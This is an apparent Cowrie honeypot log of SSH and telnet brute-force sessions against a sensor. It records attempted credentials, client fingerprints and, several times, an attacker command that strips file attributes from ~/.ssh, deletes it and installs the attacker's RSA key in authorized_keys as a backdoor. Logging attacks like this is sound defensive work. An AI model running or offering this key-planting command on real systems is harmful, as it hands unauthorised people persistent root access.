{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:49:55.788634Z","src_ip":"212.227.235.229","session":"6bb5b846a524"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:49:55.862277Z","src_ip":"212.227.235.229","session":"6bb5b846a524"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:49:55.863341Z","src_ip":"212.227.235.229","session":"6bb5b846a524"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43332,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1cb6fb402d9","protocol":"ssh","message":"New connection: 212.227.235.229:43332 (1.2.3.4:22) [session: d1cb6fb402d9]","sensor":"my-vps","timestamp":"2025-08-26T04:49:55.934888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:49:55.935703Z","src_ip":"212.227.235.229","session":"d1cb6fb402d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:49:56.008133Z","src_ip":"212.227.235.229","session":"d1cb6fb402d9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:49:56.339316Z","src_ip":"212.227.235.229","session":"d1cb6fb402d9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:49:57.414348Z","src_ip":"212.227.235.229","session":"d1cb6fb402d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60528,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b1e5bbbcd35","protocol":"ssh","message":"New connection: 212.227.235.229:60528 (1.2.3.4:22) [session: 5b1e5bbbcd35]","sensor":"my-vps","timestamp":"2025-08-26T04:49:57.488876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:49:57.489622Z","src_ip":"212.227.235.229","session":"5b1e5bbbcd35"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:49:57.565352Z","src_ip":"212.227.235.229","session":"5b1e5bbbcd35"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:49:57.908249Z","src_ip":"212.227.235.229","session":"5b1e5bbbcd35"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:49:57.983996Z","src_ip":"212.227.235.229","session":"6bb5b846a524"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:49:57.985476Z","src_ip":"212.227.235.229","session":"5b1e5bbbcd35"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:50:29.484927Z","src_ip":"212.227.125.160","session":"b7a945b13685"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56958,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5614c91bcc4","protocol":"ssh","message":"New connection: 212.227.235.229:56958 (1.2.3.4:22) [session: a5614c91bcc4]","sensor":"my-vps","timestamp":"2025-08-26T04:50:50.641103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:50:50.642029Z","src_ip":"212.227.235.229","session":"a5614c91bcc4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:50:50.896709Z","src_ip":"212.227.235.229","session":"a5614c91bcc4"}
{"eventid":"cowrie.login.failed","username":"deamon_root","password":"deamon_root","message":"login attempt [deamon_root/deamon_root] failed","sensor":"my-vps","timestamp":"2025-08-26T04:50:51.958127Z","src_ip":"212.227.235.229","session":"a5614c91bcc4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40216,"dst_ip":"1.2.3.4","dst_port":23,"session":"d039355cde60","protocol":"telnet","message":"New connection: 212.227.125.160:40216 (1.2.3.4:23) [session: d039355cde60]","sensor":"my-vps","timestamp":"2025-08-26T04:50:52.546332Z"}
{"eventid":"cowrie.session.closed","duration":0.12927842140197754,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:50:52.675540Z","src_ip":"212.227.125.160","session":"d039355cde60"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:50:53.214884Z","src_ip":"212.227.235.229","session":"a5614c91bcc4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60046,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd6cf892c2af","protocol":"ssh","message":"New connection: 212.227.235.229:60046 (1.2.3.4:22) [session: fd6cf892c2af]","sensor":"my-vps","timestamp":"2025-08-26T04:50:54.038909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:50:54.039935Z","src_ip":"212.227.235.229","session":"fd6cf892c2af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:50:54.110580Z","src_ip":"212.227.235.229","session":"fd6cf892c2af"}
{"eventid":"cowrie.login.success","username":"root","password":"xg123456","message":"login attempt [root/xg123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:50:54.395663Z","src_ip":"212.227.235.229","session":"fd6cf892c2af"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:50:54.588844Z","src_ip":"212.227.235.229","session":"fd6cf892c2af"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:50:54.589536Z","src_ip":"212.227.235.229","session":"fd6cf892c2af"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:50:54.590449Z","src_ip":"212.227.235.229","session":"fd6cf892c2af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:50:54.663105Z","src_ip":"212.227.235.229","session":"fd6cf892c2af"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:50:54.864774Z","src_ip":"212.227.235.229","session":"fd6cf892c2af"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:50:54.865511Z","src_ip":"212.227.235.229","session":"fd6cf892c2af"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:50:54.938954Z","src_ip":"212.227.235.229","session":"fd6cf892c2af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:50:54.939838Z","src_ip":"212.227.235.229","session":"fd6cf892c2af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60056,"dst_ip":"1.2.3.4","dst_port":22,"session":"22e1fc491fdf","protocol":"ssh","message":"New connection: 212.227.235.229:60056 (1.2.3.4:22) [session: 22e1fc491fdf]","sensor":"my-vps","timestamp":"2025-08-26T04:50:55.011104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:50:55.011976Z","src_ip":"212.227.235.229","session":"22e1fc491fdf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:50:55.084270Z","src_ip":"212.227.235.229","session":"22e1fc491fdf"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:50:55.415776Z","src_ip":"212.227.235.229","session":"22e1fc491fdf"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:50:56.491058Z","src_ip":"212.227.235.229","session":"22e1fc491fdf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60070,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d30a2f5e146","protocol":"ssh","message":"New connection: 212.227.235.229:60070 (1.2.3.4:22) [session: 6d30a2f5e146]","sensor":"my-vps","timestamp":"2025-08-26T04:50:56.565389Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:50:56.566349Z","src_ip":"212.227.235.229","session":"6d30a2f5e146"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:50:56.641748Z","src_ip":"212.227.235.229","session":"6d30a2f5e146"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:50:56.984162Z","src_ip":"212.227.235.229","session":"6d30a2f5e146"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:50:57.060640Z","src_ip":"212.227.235.229","session":"fd6cf892c2af"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:50:57.061911Z","src_ip":"212.227.235.229","session":"6d30a2f5e146"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39642,"dst_ip":"1.2.3.4","dst_port":23,"session":"19d2d7d966bc","protocol":"telnet","message":"New connection: 212.227.125.160:39642 (1.2.3.4:23) [session: 19d2d7d966bc]","sensor":"my-vps","timestamp":"2025-08-26T04:50:59.421189Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.125.160:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.125.160:23] failed","sensor":"my-vps","timestamp":"2025-08-26T04:50:59.422429Z","src_ip":"212.227.125.160","session":"19d2d7d966bc"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-26T04:50:59.423405Z","src_ip":"212.227.125.160","session":"19d2d7d966bc"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-26T04:50:59.424335Z","src_ip":"212.227.125.160","session":"19d2d7d966bc"}
{"eventid":"cowrie.session.closed","duration":0.11754560470581055,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:50:59.538653Z","src_ip":"212.227.125.160","session":"19d2d7d966bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45446,"dst_ip":"1.2.3.4","dst_port":22,"session":"11beee177a00","protocol":"ssh","message":"New connection: 212.227.235.229:45446 (1.2.3.4:22) [session: 11beee177a00]","sensor":"my-vps","timestamp":"2025-08-26T04:51:04.202577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:51:04.203410Z","src_ip":"212.227.235.229","session":"11beee177a00"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:51:04.472194Z","src_ip":"212.227.235.229","session":"11beee177a00"}
